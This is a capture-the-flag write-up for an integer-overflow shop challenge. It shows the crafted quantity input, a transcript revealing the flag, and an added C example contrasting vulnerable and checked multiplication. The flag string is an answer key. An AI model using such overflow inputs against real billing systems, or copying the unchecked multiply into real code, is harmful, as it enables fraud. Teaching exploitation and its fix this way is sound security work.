Difficulty: easy

Category: pwn

Author: xnull

Description:

### Integer Overflow Shop

This shop sells flags for 1000 coins each. You only have 500 coins in your wallet.

Can you exploit an integer overflow to buy the flag anyway?

**Access:** Connect to the binary with `ncat --ssl [host] [port]` or use pwntools.

Solution

We can use the maximum signed 64-bit integer divided by the cost (9223372036854775807 / 1000) as the quantity to buy, which makes the total cost overflow:

```
===== Flag Shop =====
Flag price: 1000 coins each
Your wallet: 500 coins

How many flags do you want to buy? 9223372036854776.0
Total cost: 192 coins

Purchase successful!
Here's your flag: ENDLM{5d2b5b1c8225fd535e2bde5e612993d9e055322ccb9d8507}
```

Flag: ENDLM{5d2b5b1c8225fd535e2bde5e612993d9e055322ccb9d8507}
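Why the affordability check passes, and how a checked multiply closes the hole, as an added C example; it is not the challenge binary's source, which the page does not show. `PRICE` and `WALLET` come from the challenge text, while the function names and the plain 64-bit multiply are assumptions.

```c
/* Added example: models an unchecked quantity * price, not the real binary. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define PRICE  1000  /* flag price from the challenge text */
#define WALLET 500   /* wallet balance from the challenge text */

/* Unchecked total. The multiply is done in uint64_t so the wraparound is
 * well defined here, then reinterpreted as the signed value a naive
 * `int64_t total = qty * PRICE` would typically end up holding. */
int64_t unchecked_total(int64_t qty) {
    return (int64_t)((uint64_t)qty * (uint64_t)PRICE);
}

/* Vulnerable affordability check: trusts the wrapped total. */
bool can_buy_unchecked(int64_t qty) {
    return unchecked_total(qty) <= WALLET;
}

/* Hardened check: reject non-positive quantities and any product that
 * does not fit in int64_t before comparing against the wallet.
 * __builtin_mul_overflow is a GCC/Clang builtin. */
bool can_buy_checked(int64_t qty, int64_t *total) {
    if (qty <= 0)
        return false;
    if (__builtin_mul_overflow(qty, (int64_t)PRICE, total))
        return false;                /* product exceeds INT64_MAX */
    return *total <= WALLET;
}

int main(void) {
    int64_t qty = 9223372036854776;  /* quantity used in the solution */
    int64_t total = 0;
    printf("unchecked total: %lld -> %s\n",
           (long long)unchecked_total(qty),
           can_buy_unchecked(qty) ? "accepted" : "rejected");
    printf("checked: %s\n",
           can_buy_checked(qty, &total) ? "accepted" : "rejected");
    return 0;
}
```

The true product, 9223372036854776000, is 193 more than the signed 64-bit maximum, and its low 63 bits are 192, the total shown in the transcript.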